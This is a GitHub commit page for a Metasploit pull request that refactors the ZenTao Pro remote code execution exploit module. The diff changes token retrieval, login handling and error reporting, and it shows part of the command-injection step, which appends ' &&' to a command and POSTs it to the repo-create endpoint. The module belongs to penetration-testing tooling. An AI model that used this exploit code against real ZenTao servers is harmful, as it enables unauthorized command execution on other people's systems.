Merge pull request #2 from space-r7/zentao-pro-changes

Replace ret CheckCode with fail_with()
rapid7 · Jul 17, 2020 · 7981672 · 7981672
2 parents 637b9ab + 368adc2
commit 7981672
Showing 1 changed file with 20 additions and 7 deletions.
diff --git a/modules/exploits/windows/http/zentao_pro_rce.rb b/modules/exploits/windows/http/zentao_pro_rce.rb
@@ -127,8 +127,7 @@ def check
 
     # obtain cookie and random value necessary to autenticate later
     @cookie = res.get_cookies
-    html = res.get_html_document
-    @random_value = html.at('input[@name="verifyRand"]')['value']
+    retrieve_rand_val(res)
     if @cookie.blank? || @random_value.blank?
       return CheckCode::Unknown('Unable to obtain the tokens required for authentication')
     end
@@ -149,7 +148,21 @@ def check
 
   end
 
+  def retrieve_rand_val(res)
+    html = res.get_html_document
+    @random_value = html.at('input[@name="verifyRand"]')['value']
+
+    fail_with(Failure::NotFound, 'Failed to retrieve token') unless @random_value
+  end
+
   def login
+    unless @random_value
+      res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'user-login.html'))
+      fail_with(Failure::UnexpectedReply, 'Unable to reach login page') unless res
+      @cookie = res.get_cookies
+      retrieve_rand_val(res)
+    end
+
     # generate md5 hashes required for authentication
     hashed_pass = Digest::MD5.hexdigest(datastore['PASSWORD'].to_s)
     final_hash = Digest::MD5.hexdigest("#{hashed_pass}#{@random_value}")
@@ -161,7 +174,7 @@ def login
       'cookie' => @cookie,
       'headers' => {
         'Accept' => 'application/json, text/javascript, */*; q=0.01',
-        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login')}",
+        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login.html')}",
         'X-Requested-With' => 'XMLHttpRequest',
         'Origin' => "http://#{datastore['RHOSTS']}",
         'Accept-Encoding' => 'gzip, deflate',
@@ -178,11 +191,11 @@ def login
     })
 
     unless res
-      return CheckCode::Unknown('Connection failed')
+      fail_with(Failure::Disconnected, 'Connection failed')
     end
 
     unless res.code == 200 && res.body.include?('success')
-      return CheckCode::Unknown('Failed to authenticate. Please check if you have set the correct username and password.')
+      fail_with(Failure::NoAccess, 'Failed to authenticate. Please check if you have set the correct username and password.')
     end
 
     # visit /pro/, which is required to get to the dashboard at /pro/my/
@@ -193,7 +206,7 @@ def login
       'headers' => {
         'Upgrade-Insecure-Requests' => '1',
         'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
-        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login')}",
+        'Referer' => "http://#{datastore['RHOSTS']}#{normalize_uri(target_uri.path, 'user-login.html')}",
         'Accept-Encoding' => 'gzip, deflate',
         'Accept-Language' => 'en-US,en;q=0.9'
       }
@@ -216,7 +229,7 @@ def login
   end
 
   def execute_command(cmd, _opts = {})
-    cmd << ' &&' # this is necessary for the commands to succeed
+    cmd << ' &&' # this is necessary for compatibility with x86 targets (for x64 the module also works without this)
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'repo-create'),